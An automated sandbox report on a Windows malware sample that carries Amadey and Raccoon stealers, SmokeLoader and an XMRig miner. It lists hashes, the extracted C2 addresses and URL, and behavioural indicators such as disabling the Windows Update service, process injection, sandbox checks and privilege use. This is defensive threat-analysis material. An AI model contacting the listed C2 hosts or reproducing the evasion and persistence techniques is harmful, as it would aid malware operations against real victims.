Analysis
max time kernel: 151s
max time network: 150s
platform: windows10-2004_x64
resource: win10v2004-20220812-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
submitted: 31-01-2023 08:50
Static task: static1
Behavioral task: behavioral1
Sample: 83baf716c50b90d398e1285d0c8c04c8.exe
Resource: win7-20220812-en
General
Target: 83baf716c50b90d398e1285d0c8c04c8.exe
Size: 4.5MB
MD5: 83baf716c50b90d398e1285d0c8c04c8
SHA1: f3fcfe9bc9979ee7e3788507d10499d031df4c5c
SHA256: 2c18cc487d7d1078460dce7e68108cb99eab6cb9ee1955ca4df3b2376f0a0e8b
SHA512: fcdfa7df6a6a454f95c34a6a25aef620d3caa055bf9332579f31ed63990534532c93918ac9ffca698912cb0eb123f31c58f46e78e912cfaa758f34f0c9e84213
SSDEEP: 98304:XNuy0rzmaXuKBh0MiS+dOUOTvwuw8/VnZaSavvETlCC:duyGKZKBh0M6ObT19Z/u3
Malware Config
Extracted
  Family: amadey
  Version: 3.65
  C2: 77.73.134.27/8bmdh3Slb2/index.php
Extracted
  Family: raccoon
  04f8fa0bf52b1b98a127f6deeac54f84
  C2: http://94.131.3.70/
  C2: http://83.217.11.11/
  C2: http://83.217.11.13/
  C2: http://83.217.11.14/
  C2: http://45.15.156.222/
Signatures

Detects Smokeloader packer 1 IoC
Processes:
resource | yara_rule
behavioral2/memory/1428-200-0x00000000004A0000-0x00000000004A9000-memory.dmp | family_smokeloader
Modifies security service 2 TTPs 5 IoCs
Processes:
description | ioc | process
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo | reg.exe
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
description | pid | pid_target | process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 2240 | 4020 | rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 1696 | 4020 | rundll32.exe
SmokeLoader
Modular backdoor trojan in use since 2014.
Suspicious use of NtCreateUserProcessOtherParentProcess 13 IoCs
Processes:
description | pid | process | target process
PID 4648 created 2596 | 4648 | XandETC.exe | Explorer.EXE
PID 4648 created 2596 | 4648 | XandETC.exe | Explorer.EXE
PID 4648 created 2596 | 4648 | XandETC.exe | Explorer.EXE
PID 4648 created 2596 | 4648 | XandETC.exe | Explorer.EXE
PID 4648 created 2596 | 4648 | XandETC.exe | Explorer.EXE
PID 3560 created 2596 | 3560 | updater.exe | Explorer.EXE
PID 3560 created 2596 | 3560 | updater.exe | Explorer.EXE
PID 3560 created 2596 | 3560 | updater.exe | Explorer.EXE
PID 3560 created 2596 | 3560 | updater.exe | Explorer.EXE
PID 3560 created 2596 | 3560 | updater.exe | Explorer.EXE
PID 760 created 2596 | 760 | conhost.exe | Explorer.EXE
PID 3560 created 2596 | 3560 | updater.exe | Explorer.EXE
PID 3560 created 2596 | 3560 | updater.exe | Explorer.EXE
XMRig Miner payload 2 IoCs
Processes:
resource | yara_rule
behavioral2/memory/1384-297-0x00007FF78F0E0000-0x00007FF78F8D4000-memory.dmp | xmrig
behavioral2/memory/1384-299-0x00007FF78F0E0000-0x00007FF78F8D4000-memory.dmp | xmrig
Blocklisted process makes network request 1 IoC
Processes:
flow | pid | process
135 | 1264 | rundll32.exe
Downloads MZ/PE file
Executes dropped EXE 15 IoCs
Processes:
pid | process
1932 | Player3.exe
804 | pb1111.exe
3708 | ddli.exe
3984 | nbveek.exe
5004 | birges.exe
4528 | ddli.exe
2976 | pb1111.exe
2368 | random.exe
1932 | random.exe
4648 | XandETC.exe
3700 | nbveek.exe
1428 | ChromeSetup.exe
2564 | 8D9A.exe
3560 | updater.exe
1648 | nbveek.exe
Stops running service(s) 3 TTPs

Processes:
resource | yara_rule
behavioral2/memory/1384-297-0x00007FF78F0E0000-0x00007FF78F8D4000-memory.dmp | upx
behavioral2/memory/1384-299-0x00007FF78F0E0000-0x00007FF78F8D4000-memory.dmp | upx

Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\pb1111.exe | vmprotect
C:\Users\Admin\AppData\Local\Temp\pb1111.exe | vmprotect
behavioral2/memory/804-147-0x0000000140000000-0x0000000140618000-memory.dmp | vmprotect
C:\Users\Admin\AppData\Local\Temp\1000089001\pb1111.exe | vmprotect
C:\Users\Admin\AppData\Local\Temp\1000089001\pb1111.exe | vmprotect
behavioral2/memory/2976-180-0x0000000140000000-0x000000014061A000-memory.dmp | vmprotect
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation | nbveek.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation | ddli.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation | random.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation | 83baf716c50b90d398e1285d0c8c04c8.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation | Player3.exe
Loads dropped DLL 5 IoCs
Processes:
pid | process
4884 | rundll32.exe
832 | rundll32.exe
4612 | rundll32.exe
2116 | rundll32.exe
1264 | rundll32.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.

Legitimate hosting services abused for malware hosting/C2 1 TTP
Drops file in System32 directory 3 IoCs
Processes:
description | ioc | process
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | powershell.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
Suspicious use of SetThreadContext 4 IoCs
Processes:
description | pid | process | target process
PID 5004 set thread context of 2712 | 5004 | birges.exe | jsc.exe
PID 1264 set thread context of 3380 | 1264 | rundll32.exe | rundll32.exe
PID 3560 set thread context of 760 | 3560 | updater.exe | conhost.exe
PID 3560 set thread context of 1384 | 3560 | updater.exe | conhost.exe
Drops file in Program Files directory 4 IoCs
Processes:
description | ioc | process
File created | C:\Program Files\Google\Libs\g.log | cmd.exe
File created | C:\Program Files\Google\Libs\g.log | cmd.exe
File created | C:\Program Files\Notepad\Chrome\updater.exe | XandETC.exe
File created | C:\Program Files\Google\Libs\WR64.sys | updater.exe
Launches sc.exe 10 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes:
pid | process
1524 | sc.exe
4876 | sc.exe
4660 | sc.exe
4148 | sc.exe
4336 | sc.exe
1016 | sc.exe
2752 | sc.exe
5004 | sc.exe
3676 | sc.exe
760 | sc.exe
Enumerates physical storage devices 1 TTP
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Program crash 4 IoCs
Processes:
pid | pid_target | process | target process
2460 | 4884 | WerFault.exe | rundll32.exe
4564 | 832 | WerFault.exe | rundll32.exe
4856 | 2116 | WerFault.exe | rundll32.exe
3400 | 2564 | WerFault.exe | 8D9A.exe
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | ChromeSetup.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | ChromeSetup.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | ChromeSetup.exe
Checks processor information in registry 2 TTPs 17 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor | rundll32.exe
Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor | rundll32.exe
Key value enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\VendorIdentifier | rundll32.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Revision | rundll32.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Component Information | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | rundll32.exe
Key value enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | rundll32.exe
Creates scheduled task(s) 1 TTP 1 IoC
Schtasks is often used by malware for persistence or to perform post-infection execution.

Processes:
description | ioc | process
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser | Explorer.EXE
Set value (data) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\Toolbar | Explorer.EXE
Modifies data under HKEY_USERS 64 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | conhost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT | conhost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
Modifies registry class 30 IoCs
Processes:
description | ioc | process
Set value (data) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 | Explorer.EXE
Set value (data) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 820074001c0043465346160031000000000000000000100041707044617461000000741a595e96dfd3488d671733bcee28bac5cdfadf9f6756418947c5c76bc0b67f400009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004100700070004400610074006100000042000000 | Explorer.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic" | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | Explorer.EXE
Set value (data) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = 00000000ffffffff | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell | Explorer.EXE
Set value (data) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | rundll32.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 = 4e003100000000003f56794e100054656d7000003a0009000400efbe0c55ec983f56804e2e0000000000000000000000000000000000000000000000000029815500540065006d007000000014000000 | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings | rundll32.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | Explorer.EXE
Set value (data) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff | Explorer.EXE
Set value (data) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 50003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014000000 | Explorer.EXE
Set value (data) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f44471a0359723fa74489c55595fe6b30ee0000 | Explorer.EXE
Set value (data) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | Explorer.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\NodeSlot = "1" | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\WorkFolders | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | rundll32.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | Explorer.EXE
Set value (data) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\MRUListEx = ffffffff | Explorer.EXE
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | rundll32.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | rundll32.exe
Key created | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 | Explorer.EXE
Set value (data) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 | Explorer.EXE
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description | flow | ioc
HTTP User-Agent header | 10 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header | 86 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Suspicious behavior: AddClipboardFormatListener 1 IoC
Processes:
pid | process
2596 | Explorer.EXE
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
pid | process
5004 | birges.exe (26 entries)
1428 | ChromeSetup.exe (2 entries)
2596 | Explorer.EXE (36 entries)
Suspicious behavior: GetForegroundWindowSpam 1 IoC
Processes:
pid | process
2596 | Explorer.EXE
Suspicious behavior: LoadsDriver 1 IoC
Processes:
pid | process
656 |
Suspicious behavior: MapViewOfSection 1 IoC
Processes:
pid | process
1428 | ChromeSetup.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
description | pid | process
Token: SeDebugPrivilege | 5004 | birges.exe
Token: SeShutdownPrivilege | 2596 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 2596 | Explorer.EXE
Token: SeShutdownPrivilege | 2596 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 2596 | Explorer.EXE
Token: SeDebugPrivilege | 1944 | powershell.exe
Token: SeDebugPrivilege | 4800 | powershell.exe
Token: SeShutdownPrivilege | 3608 | powercfg.exe
Token: SeCreatePagefilePrivilege | 3608 | powercfg.exe
Token: SeShutdownPrivilege | 1388 | powercfg.exe
Token: SeCreatePagefilePrivilege | 1388 | powercfg.exe
Token: SeShutdownPrivilege | 3348 | powercfg.exe
Token: SeCreatePagefilePrivilege | 3348 | powercfg.exe
Token: SeShutdownPrivilege | 2848 | powercfg.exe
Token: SeCreatePagefilePrivilege | 2848 | powercfg.exe
Token: SeIncreaseQuotaPrivilege | 4800 | powershell.exe
Token: SeSecurityPrivilege | 4800 | powershell.exe
Token: SeTakeOwnershipPrivilege | 4800 | powershell.exe
Token: SeLoadDriverPrivilege | 4800 | powershell.exe
Token: SeSystemProfilePrivilege | 4800 | powershell.exe
Token: SeSystemtimePrivilege | 4800 | powershell.exe
Token: SeProfSingleProcessPrivilege | 4800 | powershell.exe
Token: SeIncBasePriorityPrivilege | 4800 | powershell.exe
Token: SeCreatePagefilePrivilege | 4800 | powershell.exe
Token: SeBackupPrivilege | 4800 | powershell.exe
Token: SeRestorePrivilege | 4800 | powershell.exe
Token: SeShutdownPrivilege | 4800 | powershell.exe
Token: SeDebugPrivilege | 4800 | powershell.exe
Token: SeSystemEnvironmentPrivilege | 4800 | powershell.exe
Token: SeRemoteShutdownPrivilege | 4800 | powershell.exe
Token: SeUndockPrivilege | 4800 | powershell.exe
Token: SeManageVolumePrivilege | 4800 | powershell.exe
Token: 33 | 4800 | powershell.exe
Token: 34 | 4800 | powershell.exe
Token: 35 | 4800 | powershell.exe
Token: 36 | 4800 | powershell.exe
Token: SeIncreaseQuotaPrivilege | 4800 | powershell.exe
Token: SeSecurityPrivilege | 4800 | powershell.exe
Token: SeTakeOwnershipPrivilege | 4800 | powershell.exe
Token: SeLoadDriverPrivilege | 4800 | powershell.exe
Token: SeSystemProfilePrivilege | 4800 | powershell.exe
Token: SeSystemtimePrivilege | 4800 | powershell.exe
Token: SeProfSingleProcessPrivilege | 4800 | powershell.exe
Token: SeIncBasePriorityPrivilege | 4800 | powershell.exe
Token: SeCreatePagefilePrivilege | 4800 | powershell.exe
Token: SeBackupPrivilege | 4800 | powershell.exe
Token: SeRestorePrivilege | 4800 | powershell.exe
Token: SeShutdownPrivilege | 4800 | powershell.exe
Token: SeDebugPrivilege | 4800 | powershell.exe
Token: SeSystemEnvironmentPrivilege | 4800 | powershell.exe
Token: SeRemoteShutdownPrivilege | 4800 | powershell.exe
Token: SeUndockPrivilege | 4800 | powershell.exe
Token: SeManageVolumePrivilege | 4800 | powershell.exe
Token: 33 | 4800 | powershell.exe
Token: 34 | 4800 | powershell.exe
Token: 35 | 4800 | powershell.exe
Token: 36 | 4800 | powershell.exe
Token: SeIncreaseQuotaPrivilege | 4800 | powershell.exe
